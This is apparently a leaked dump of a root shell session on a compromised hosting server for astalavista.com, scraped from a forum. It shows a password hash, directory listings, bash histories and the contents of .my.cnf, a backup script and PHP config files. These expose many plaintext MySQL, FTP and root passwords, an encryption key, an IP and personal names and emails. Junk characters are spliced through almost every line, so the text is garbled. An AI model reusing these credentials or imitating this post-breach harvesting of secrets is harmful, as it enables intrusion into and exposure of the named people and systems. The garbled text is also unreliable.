+ U! b' E1 p" t9 X. ^* j4 ?, w5 Castanet 1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
% ?; q+ X# X, H. o& R( e) H) M; a5 z. y7 o
sh-3.2# cat /etc/motd
; t# r/ f$ d8 l* D1 [#####################################################- g# Q2 G* s1 L. _/ s
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #) K" J1 }+ r+ I5 I B2 y
# |__| [__ | |__| | |__| | | | [__ | |__| #
+ _' j2 N9 ?, a$ A' x% a# | | ___] | | | |___ | | \/ | ___] | | | #& s: j% g: P0 W# U: Z( }+ b
# #8 S: r2 h5 w9 {, O( ]
#####################################################' z: Q7 B0 r( s* K0 o0 N' {+ _. M
# #
8 y5 l( v0 X& D; q( x' b# Admin Contact - 链接标记support@secureservertech.com #2 |# `, x" u7 H% t, e% E
# #
, l0 a! G; _- p8 k$ x4 f* v# Available ShortCuts #
- _& J. e. k; N- w0 s# #
" `4 h( h# {; k9 C+ h# nst - list active connections #
2 S! N1 L" t1 K- N9 H$ m) s. ^+ F# ddos - shows how many times each ip is connected #
$ v3 S) Y$ o* g0 m5 E# ltr - restart the webserver #6 Z7 b: w/ T+ {0 f- C, L/ T* {% f5 C
# phpc - edit the php config file #( z3 j6 l3 r- w6 d+ H% j0 {
# htc - edit the webserver configuration file #3 ~- P- Y, J: f$ w7 v o* k
# up - uptime #. d2 R# C* `& j ~) _; ?/ y+ _ V
# etd - edit the motd of the day file #
8 w8 k2 R) X& {& h- f$ {2 c: }$ a# htr - start and restart apache if needed #
, t5 f7 J7 a7 b( A/ I( O/ G# syng - shows active SYN_RECV connections #* Z, ]; o' i. c. z/ s% D
# synd - syn flood blocker - “synd -h” for usage #- K6 {* M, w1 v3 Y a6 N' q
#####################################################
) o9 O. X/ \4 n% n# NOTES: #
5 I8 O; H' g) k. Z6 x! @( U7 u# Last Upgrade - 12-08-2008 by JF #$ \5 m6 V6 b: y' J6 \* Y+ s
# My.cnf/Mysql Optimization - 1-28-09 #. \3 `( ?( [, h1 ~6 g# U& b- B
# #
4 e; \0 q+ q5 f# #
2 O& A6 a( Q7 B9 i% b3 k% m# #: p2 E3 t1 p! `, m! e" V l: L
#####################################################
; E8 @# t: S! e
1 [$ K" L2 L7 ~$ f. S* D7 Fsh-3.2# lastlog | grep -v Never' ]5 e# j5 k2 U, f2 Q0 L
Username Port From Latest
9 O# V% n8 }6 |! Y/ Proot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
- l' s9 Q2 o+ I% Qadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 20080 o6 V6 e3 m% K7 @
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
# v. Z7 ]% N; j. s) G! j* _astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009) n( a$ s- J9 X
; D( K3 }& n! r# S6 d' p g. {sh-3.2# ls -la5 X# r2 M6 k7 z- P ^
total 453376. w( i x9 M8 T1 a4 p
drwxr-x— 15 root root 4096 Jun 4 08:40 .' F/ G3 K! O6 ~7 d6 O* J
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
- X6 s, F* k- W$ K- `- @-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
2 w( O5 t$ \; j: i2 J-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
1 a3 a4 f9 Z' z% n) y- e-rw——- 1 root root 16836 Jun 4 07:21 .bash_history6 R& L5 O8 U' h0 R( X5 t
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout* T% I" a8 q: X, |2 m
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
# U/ Z7 T7 i( u0 v0 m* X-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
( l$ @' J" {# f2 y* S, p5 P; U-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
& }7 \+ O8 `' L- t0 R) D-rw-r–r– 1 root root 1327 Nov 29 2007 cert
5 q6 c0 c: g4 a% o& @( Q# J# K-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
( x( l/ \9 ]8 D8 Udrwxr-xr-x 4 root root 4096 May 20 2008 .cpan
" J( @; m# p" W" {9 P9 ?-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc1 E& P7 {- Z/ P3 M
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql, V$ F ^# j6 U. b
drwx—— 2 root root 4096 Oct 28 2007 .elinks
1 \7 s1 e0 P# X" ndrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1% } y7 D! H& F, Q2 A
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz26 Z9 m) V: n: w# x N
-rw——- 1 root root 0 Apr 16 13:19 .history; S- _% I+ Q- ~% w
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
_* \8 {/ c d# W1 v-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog: G! t2 H% l8 P/ V8 M8 y
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh% B: {% F( G& K- K6 s/ L8 k9 B
-rw——- 1 root root 35 Jun 2 14:23 .lesshst
* A, t6 r, `2 R0 T6 w9 H5 Ddrwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
$ q# ]0 V6 q9 c" M [. J9 edrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
b( z& L0 w0 O( n Z-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
9 K% a3 z9 W+ N-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz25 o* c9 R, ^ L
-rwx—— 1 root root 760 Sep 18 2008 lp8 {) N) F4 |( H1 y" T1 y
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.12 `; Y% z+ C2 v* |
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
9 g# m1 R) n+ x. L& ^+ Q a9 Q-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
# c: H4 y2 I6 edrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
( j, J4 G4 h* Y% u. D& ?-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
/ a% q, j* C9 x5 E! [# Tdrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
/ T, ]* K% O+ I+ T Q: _-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz7 ]6 X3 J9 ^1 K
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh! |3 |0 @/ |# G& o( b' t7 i
-rw——- 1 root root 41 Oct 19 2007 .my.cnf
2 A U0 z9 z2 X% F2 [-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history% S3 |! N. W' e H9 r
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
: l' i9 S; V1 D- H w" L& j-rw——- 1 root root 41 May 20 2008 .mytop: f; z' U! t' y) i
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
) ]& U" G. L1 T1 T- ^4 n-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz7 u2 a) H- S/ k. W/ ~& c! Z
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp: N5 ^. `' U+ o! V5 W- { u
-rw——- 1 root root 1462 Sep 21 2007 opt.php/ m2 p' Q9 S, T9 ^) Z# c4 A/ K& H \& A
-rw-r–r– 1 root root 3371 Sep 22 2007 p
/ S6 m- p( N+ s r3 D-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
8 {0 S' k- U8 I9 p-rw——- 1 root root 1024 Feb 3 21:32 .rnd
5 @* L/ {: O& V-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
. R, E% ~% c( F/ u-rw-r–r– 1 root root 887 Nov 28 2007 server.key/ }, T, a7 E' {: z# S
drwx—— 2 root root 4096 Oct 10 2008 .ssh
) C3 h5 a. n7 S% d6 }( Q2 C-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat' T# j$ z/ z: B5 m; M. B" U+ t
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc: C* v( u8 }. w) y4 [% o; U' P
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip# t" t9 m0 f) m2 O2 }4 D
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1. I: q" w, p8 g1 I- s
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp, `8 X) L1 i5 }4 Y X- n3 Z
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh6 H V" j' G, }" t! d; @3 l8 U3 ^
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0- z: V7 _% A% o2 x; }
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
5 N( |5 z0 y6 f$ i6 J-rw——- 1 root root 12997 May 16 2008 .viminfo% r0 k9 V5 J4 y" K- u3 s% D
) P0 O! |; U$ R5 |. Q
sh-3.2# cat .bash_history
7 k- t' J# J: {# {2 ~$ t[snip]: S, s' q; K- r( M& f1 p
wget cp4sst.com/sstlinux.tar.gz- c& q N w) E7 |0 x- C& Y
tar zxvf sstlinux.tar.gz' j6 W: S0 b9 a. Z3 ~) L
cd linux-2.6.27.10* {& F' h) ^0 o( ?% e7 r, C
sh install.sh
; Y! i, x7 h3 F9 Z* a% e6 x+ F8 a7 ymake bzImage ; make modules ; make modules_install ; make install
5 Q4 U" y0 k# @( Z% A% f0 gmake clean
9 T( t; Y( ^; b# S: }1 p9 h9 lservice mysqld restart" h* D) X# c: }% @: w, N( B$ m0 ]& q
[snip]8 k5 ?+ [0 G: ]8 N+ F S
cd /usr/sbin/
% a0 p- J) k1 y! [chmod 4777 traceroute: D/ e' r5 j# t8 ?; I8 b) o
chmod 4777 ping
/ Q8 P' Z1 W4 s# D2 r8 \traceroute -I 链接标记[url]www.astalavista.ch[/url]" [& N& H- f" j/ W1 t4 h
[snip]
, ?7 i1 I& ~, u/ F9 \( l% r0 jvi /etc/csf/csf.conf( l& Y) }1 w9 ]0 B% R9 f! _
traceroute google.ch
$ I3 A# R/ s* |9 c0 t- Qservice csf restart
" {" o& `* J+ N3 U' Atracert google.ch
* |: r+ w P; kservice csf restart3 U9 V/ i- I, F8 B. R; W) Q. J4 {
traceroute 链接标记[url]www.google.ch[/url], ], f2 A/ a0 i
tracert 链接标记[url]www.google.ch[/url]
% s8 s% z% I% @8 Ttraceroute 链接标记[url]www.google.ch[/url]
& s" n2 W1 s% u5 Nlocate traceroute
. n% \! J" R0 D0 A3 ]3 R1 Ychown 4755 /bin/traceroute0 T8 U( s/ n& l
chown 4777 /bin/traceroute; Q. I+ [7 Q! B0 k' G; m
locate ping; h! R- ]8 Z' ]' Y3 p( c; H5 ~
chown 4755 /bin/ping% J, Q {6 w+ Z) T3 a5 {
chown 4777 /bin/ping
1 L0 h/ H2 U8 ^+ E6 Z9 ~( scd /bin/
9 {! K! X# P* @6 Qls -ali | grep ping+ A4 _9 p0 a- K! b6 `
chown root ping3 P; Q3 C3 u. T! Q9 \: O$ W
chmod 4755 ping) O" m K! q% }2 \3 N) U! D, D
ls -ali | grep traceroute
2 X, [+ \" y/ \4 {chown root traceroute) s& j' ^+ j# R. n/ `" `7 `1 Q
chmod 4755 traceroute
C) D9 }' t4 n0 K/ l6 u0 Zls -ali | grep traceroute
B! z8 f g# s2 T7 G; ttraceroute -I 链接标记[url]www.google.ch[/url]
6 Y) |! l2 D4 _. o u- j# Gtraceroute 链接标记[url]www.google.ch[/url]1 P ~' L3 p! j* F* {) V
whois pmsantos.ch
& o: S" A# J, m9 P8 T8 s[snip], g; O t: J6 P- i
mysql -h com_contrexx2_live < /root/defaultp_ports.sql' ?# o* r* V# D0 x/ l# S
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
0 a0 V s9 q. v8 W: Qmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql1 p0 _" A) j& n, D
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
5 D1 a$ s6 Z4 R/ w* wtop
$ f% N! j$ W3 y$ h) Hping ssth.ch
2 y* c/ G: l( K. Q( Y2 J8 I( ~. A6 Gping asdlkfaljgasd???ljg???lasj.ch- v( f% C# a1 W4 y# @* o% o3 X8 z) ?
ping asdlkfaljgasdlasj.ch
; q' Y; T. F* g. Z/ N* g' c) o# Y# ]ping 链接标记[url]www.ssth.ch[/url]
c% e% m u( d' U0 ]6 u% b% yping ssth.ch+ d$ B" ~9 s5 [" s
nslookup 链接标记[url]www.google.ch[/url]
! M6 j5 t# q7 N/ C' onslookup 链接标记[url]www.ssth.ch[/url]
% |% ]" W# l. L; ^/ `, A& j& j4 hman nslookup
" O7 r& I8 D) l, ~0 C' f" Zping 链接标记[url]www.google.ch[/url]) B* J8 W: C5 W g- q
nslookup 链接标记[url]www.google.ch[/url]
u6 N1 W, I) }5 mnslookup 链接标记[url]www.google.ch[/url]. D9 @/ f, J4 L- h p2 O( ~2 r* F3 R* o
nslookup salfjasdlf.ch( J2 F& m5 A) J8 E/ {% J
[snip]- p2 y& R' l3 r
openssl passwd -1 sadf
* f% m) R# {; @7 Topenssl passwd -1 5cZNHstdTy
, f: }( j+ ^# Y" i0 e6 wmysql' l) a- b4 @- Y) t
mysql
8 p. U1 U2 u+ k$ d o: Dlocate proftp
, i5 `# r: t. [0 h; cvi /etc/proftpd.passwd% M0 }* u' k' D* a" _
service proftpd restart" k H9 ?$ V5 ? k: ]' _ K
locate proftpd.conf! a/ c ~9 ?- u8 a5 w3 C) N# B
vi /etc/proftpd.conf
( O+ E/ Y: f' A2 G, {vi /etc/proftpd.passwd
1 u4 L, b2 f7 mservice proftpd restart
- E$ x8 D5 F7 {7 w[snip]* \ ?' w1 ?5 i7 ]8 g
/bin/sh /home/com/backup_system/backup.sh
^1 a4 X5 E. j$ u' Vtar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
) O$ j% ^) F: Q# ?7 N3 Xmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
; @# I2 F( e6 h8 `mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
" Y* v9 [$ x! ^5 P6 v5 ~. qls -ali
) p; K `1 y% X' K, v2 u' Hmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql9 B1 P8 ?3 b: ~ G) y, k
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
2 V6 n7 h6 }6 r4 B6 z0 F3 K" Mcrontab -l) l9 L; V6 l5 w" E' \9 S
crontab -l
' N4 ^& [) w- e" V5 Vphp -q /home/com/public_html/modifications/cronjobs/securitynews.php8 j' [1 S' x# R- l
/home/com/public_html/modifications/cronjobs/exploits.sh
& p( u Y/ h8 w" s( C1 Owget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]6 e, T5 X0 ?7 A# U& y
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
2 H) t3 {) n) C# I$ j% ~( V! ?cd lsws-4.0.3
0 `4 g, z/ B# `sh install.sh
( ^7 w( X3 Q( E, i4 E/ Auptime8 y" I+ w5 w( k
hdparm -tt /dev/sda
* t' E. r* w: X, niostat
' O+ D/ u( J" d; m! |3 Lyum install iostat
8 Z. c( U. p* r9 V- K$ Biostat
+ F6 f6 S; G& I# B7 I/ R/ ?, fwhereis iostat
, u( \ G- B, a. M6 S8 l- ]; f" ]7 lyjm clean all; u, H2 g3 s/ B3 ^
yum clean all ; yum -y update
3 s2 y( J: d: J1 [0 K# T* ? Eiostat
* v1 |! ?/ Y* F, v1 N/ ^yum install systat
' R- R; l$ ^: g! q! Q. Yrpm -qa | grep iostat2 D5 | U+ c% I9 R1 e
rpm -qa | grep sysstat
) O. ~! |/ j1 |) e- `) Z5 V' xrpm -qa | grep systat) I( U+ D, o* o2 M5 ~) q
dmesg -c
_3 _8 U9 ?( h2 Zsysctl -p' T: v' b$ z7 Z/ ~3 _7 Y
uname -r9 S w9 {5 a9 N; f- G* y
cd /usr/src2 M- |) S1 k. F, F1 ~
wget nix101.com/kernels/sstlinux.tar.gz
# o2 k2 T( N+ g9 o& j% Ishutdown -r now& E5 D u5 W# @9 G( X6 R3 ^2 H
nano -w /boot/grub/grub.conf
, E: [/ e7 ?; n: y9 h5 U
2 y ]0 a, {- Ysh-3.2# cat .my.cnf/ g) _3 C9 N- H( a
[client]; I2 V! k9 p! J d6 z. h; q8 |4 y
user=da_admin- B, k& e. |1 F0 ?
password=X9dctmRH
: d; @% {- c. k7 q/ U: @/ o
# U& e& Y6 i1 q( @ O* P% k ash-3.2# cat /home/com/backup_system/backup.sh9 I: w) m2 G- h5 O; U+ C. j
#!/bin/sh4 t2 t8 } i# U* C5 ?
#####################################################################! Q6 i+ t% U) E8 u' x/ t
# #
+ G2 a0 s& m' R4 `# incremental backup for astalavista.com #
3 l3 {& h7 A, }2 t$ N# #7 v& ~4 y% E/ H% @& b3 e/ _& P
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
% `( `. J V- \- ] p# D: O# #
5 }5 f; M0 h# r1 k% d" L3 k) s##################################################################### u9 N3 m/ G9 W0 m% u1 p% I% B6 b
[snip]
7 r/ P& ^; Y& B/ bPROG_DIR=”/home/com/backup_system”;
% Z# `2 o e' m0 _8 rBACKUP_DIR=”/home/com/backups”;
7 ^: }; v8 o$ c3 ]( B3 b8 ?; {DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
) p) C) ]/ `6 P4 D/ S( o5 `/ l2 V# ftp for synology backup server
5 d" a/ W. J+ h4 Y( ?FTP_HOST=”212.254.194.163″;" G# G* g- Z2 q9 A) G/ Q
FTP_PORT=”21″;: e. F1 z- Y+ k. w1 C( m9 c+ k) o
FTP_USER=”astalavista.com”;
5 a) k' v/ R0 v/ W, O: o2 FFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;5 K) g( m* f& B* y1 \- L K
FTP_DIR=”/astalavista.com”;5 n- _' ]! E1 v9 ]
# database2 M" i ]% H% V! v; _
DB_HOST=”localhost”;
, T! k2 l; S% p2 S6 ?4 K" Y5 @DB_USER=”contrexxuser2″;4 \8 e* ~; S, b
DB_PASS=”0fEYNZgXz1pKe”;3 A$ ?6 h, ]2 V
DB_DATABASE1=”com_contrexx2_live”;( M' e0 I @* |5 x. L5 J y5 S
DB_DATABASE2=”com_contrexx2″;3 S+ f( P; |3 h
[snip]7 u8 h) G/ s4 D: j
ftp -in $FTP_HOST $FTP_PORT <<EOF- k* }/ ~# s# B
quote USER $FTP_USER1 f' d9 q& v* k# m" A9 z
quote PASS $FTP_PASS
2 C# v7 q9 V" Z* g7 l+ T* Rcd $FTP_DIR6 j" w3 ?7 u# H7 P
put $DB_FULLNAME-SQL_Dump.tar
2 b8 M7 H9 u9 {* f- m* Eput $BACKUP_FULLNAME-Public_HTML.tar) S1 K t% z6 ?2 b/ [# L
close
" {: q2 k$ D$ W3 tbye! s7 _ A- a6 E4 V" q
EOF
5 y8 P; w+ G$ M* K
% g" i4 R5 S' w/ N Osh-3.2# cd /home
* E8 C: ]/ Y Y0 Z8 F# psh-3.2# ls -la) f, S/ Z3 w' B. F
total 120. |; Y- f! v6 V. C1 S4 S
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .: u' I% _7 k1 ~% d
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..! K+ L2 E! K* q m2 p- e6 d
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
2 D! ^0 T8 d. E1 p$ F-rw——- 1 root root 8192 Jun 4 03:03 aquota.group5 K7 G2 H \8 n* m* G8 I
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user( ~ ?5 H+ t, l% s
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet2 S9 u9 p* R$ L- M; P+ F
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
9 e8 C1 F2 j$ \/ _8 [2 q% ?drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161$ z, v6 H* H& y! I Q
drwx–x–x 10 com com 4096 Apr 28 12:40 com
! h: g% H# T9 h2 X/ Ddrwxr-xr-x 2 root root 4096 May 17 2007 ftp
5 Z, w' r" Q6 S4 ^3 xdrwx—— 3 jon jon 4096 Sep 21 2007 jon
2 T# G- G- C7 q9 ]* ` mdrwx—— 2 root root 16384 Sep 11 2007 lost+found
! o# I0 e3 k$ N, r. xdrwxr-xr-x 2 root root 4096 Sep 14 2007 my
- c" t. @; ] m& R9 C7 D6 D8 qdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
4 P1 d3 P) m: ]) `% wdrwx—— 2 jon jon 4096 Sep 15 2007 test! m, T1 T& E) ]; f9 O5 n/ J
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
' X7 y3 B7 V/ Q+ X: T7 a
+ b- O. E# S8 [; ^/ Q- F1 }* D6 P5 Esh-3.2# cd admin8 T, M; b) P5 g$ a! r
sh-3.2# ls -la
; C% p$ \& I3 b; g" l3 Q( G$ Utotal 1735896
; V% Q1 d+ i0 U/ f6 Cdrwx–x–x 9 admin admin 4096 Nov 28 2007 .2 N3 y" _5 N; Q+ X$ ]
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
8 c9 N" Z+ z6 C: N0 p3 ~drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups v' [- e9 J) m! g4 ?* U
drwx—— 2 admin admin 4096 Sep 28 2007 backups
8 s4 t+ u0 b t0 l# A' S-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
* p8 p& ^, L ^8 k. O' X-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
5 e+ P1 b) h2 m0 h-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile$ j# o0 W Y, @' M9 @: d
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
6 S0 u4 i k, a* q0 vdrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
" L, ?0 l# r% sdrwx–x–x 6 admin admin 4096 Sep 21 2007 domains+ N' L* o) ]3 @
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap
# {- \ z. M* n4 s2 o+ K( h& M! g-rw-r–r– 1 root root 24 Sep 21 2007 info.php% ^) U$ a# `* S: q& H5 X' z
drwx—— 2 admin admin 4096 Sep 21 2007 mail) O A/ Y% E& u! {
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr8 A- o$ W, p: h6 Y
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
4 z( X' b j9 f-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
7 L) Z* @, y+ e& H! u-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz4 s5 @# }1 i4 o5 E5 l
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
, ^" s% U4 n2 U. r: M
5 u( Y3 F, ?! W+ f3 L$ ]sh-3.2# ..
6 \0 A6 A2 W* D2 H: @. t* e" q ~( Xsh-3.2# cd jon" V" M% Z* D8 x
sh-3.2# ls -la8 f7 g5 S3 u2 I3 Q
total 36
" J- D9 h x# y8 ?drwx—— 3 jon jon 4096 Sep 21 2007 .
' o2 r" X; K5 p0 ]drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..! W- x- e9 j9 {
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history2 |7 v& \# A9 n" f
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
0 k+ _- W% U# s2 g-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile1 G2 b( {6 p% c9 k
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
: v& h0 Y2 \0 L3 }, r-rw-r–r– 1 root root 24 Sep 21 2007 info.php0 T# n1 a3 m; R: O$ \3 ~) p
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html! [3 R& e" t9 E
; k1 C% d+ |4 b- P' Z9 c+ q' m# jsh-3.2# cd ..* y. G$ C8 o, S3 V$ {$ h
sh-3.2# cd test+ k7 Z* l @- s8 q8 J$ V
sh-3.2# ls -la9 d; P. ^5 _$ z* v6 n6 N
total 48
2 a2 U4 W- W" ^3 q, gdrwx—— 2 jon jon 4096 Sep 15 2007 .) q4 ~& r6 Q- Y1 E
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..+ M o; F1 ~! o ]" Q
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history- G. l% Z/ R3 m" A7 l2 B# G. b
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout3 ~9 J! R: p% w, V' e0 H
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile) s7 @% s8 e- b8 c* h8 j8 o: L
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc- n8 a2 Z5 T( B# C
sh-3.2# cat .bash_history+ Q8 E. H* D% O$ I# r; G7 _( @: R
/usr/bin/mysqladmin -u root password PoliuJhytg67
+ \% b' l4 \) v2 A& {+ R8 k5 |) l! X2 {+ a5 m* I5 M
sh-3.2# cd ..) a3 @" W7 }3 j b, u8 |0 i
sh-3.2# cd astanet8 f, k! j2 U! \$ V/ @4 n
sh-3.2# ls -la- e3 a5 _( I: S
total 52
$ u ^# x1 l) }& [6 U; udrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
+ o2 M, H, l$ N' o; Y' |7 d: ~/ _drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
4 Y% O8 I( ?- d% k% B5 \4 s3 Edrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
4 b& a: F# r4 m: o-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history; B4 F9 J+ I& P. |! m
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout3 O7 ^) C$ d; _/ r0 q2 i
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
% P' D) R! u+ [( D& ?+ l-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
6 P8 \9 G( U/ R5 S( Q# ldrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
/ B3 @# q$ E: Q5 {& Jdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap: [( t2 j) z- K' u1 S1 P
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
5 w; B: ^( D' O1 ^! j-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history9 n/ W0 R9 M0 D/ E, ~1 b
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html9 H( @/ a* E& Z3 [* a3 G) |* Q& v
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
" x4 x# z. c: @8 e. e# p# J% p9 l# `/ ]4 U/ @. l1 L1 D
sh-3.2# cd auth/1 e7 x. g4 R, C; W4 k- m% j$ T. }! v
sh-3.2# ls -la4 O: Q' W L9 ]: x8 M
total 28
6 m" @' B1 e" V# xdrwxr-xr-x 2 root root 4096 Dec 23 16:00 .# U( b* l: p S5 K* E1 I7 H
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .., ^+ a$ O" I5 g, `, t* ]# c
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php$ ~0 i: c& F- b; }( J: V
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
! K1 @1 ]! K9 ^. c1 O5 q. `-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd8 x* w" g, {: B2 V: {
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
# L& j3 E7 V4 h- o# M-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
( D3 O' [' K! r, e3 }
/ A) p: k; J! q$ B4 ~sh-3.2# cat hackercontest.config.inc.php4 U+ V0 w7 M8 k4 V2 |4 H8 `! B
<?PHP
3 t8 \* ?; M1 _2 L// Variabeln f?r Verbindung zur Datenbank //8 x* H- N) f4 x4 G
$conxHost = ‘localhost’; // MySQL hostname" ^8 w1 o3 V& S" h2 [' ^& Q, E3 k J
$conxUser = ‘hackercontest’; // MySQL user
7 K) S, \ d2 K( [: \: u2 M" B$conxPassword = ‘K6m@7dUc’; // MySQL password
u, h0 H7 g- U) t) ?6 H0 \7 @$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
( z" n B3 C7 x$ ??>( c |$ t! V9 q! N; e2 m
sh-3.2# cat hosting.config.inc.php6 t/ m' d1 N/ k7 ?3 W$ s3 H" I
<?PHP4 P3 |4 D# C3 @3 {% n& O
// Variabeln f?r Verbindung zur Datenbank //7 w: O+ }# y) U! S; k6 p# Z; N
$conxHost = ‘localhost’; // MySQL hostname
y+ d# l& f: T' u& c$conxUser = ‘hostinguser’; // MySQL user
0 p3 {6 R8 E1 G$conxPassword = ‘cXvB3981′; // MySQL password- c! |7 G( n$ H; n+ ~2 W
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
7 A$ U0 ~) v8 h, R?>5 z( ]2 {4 [4 l9 a; n' E
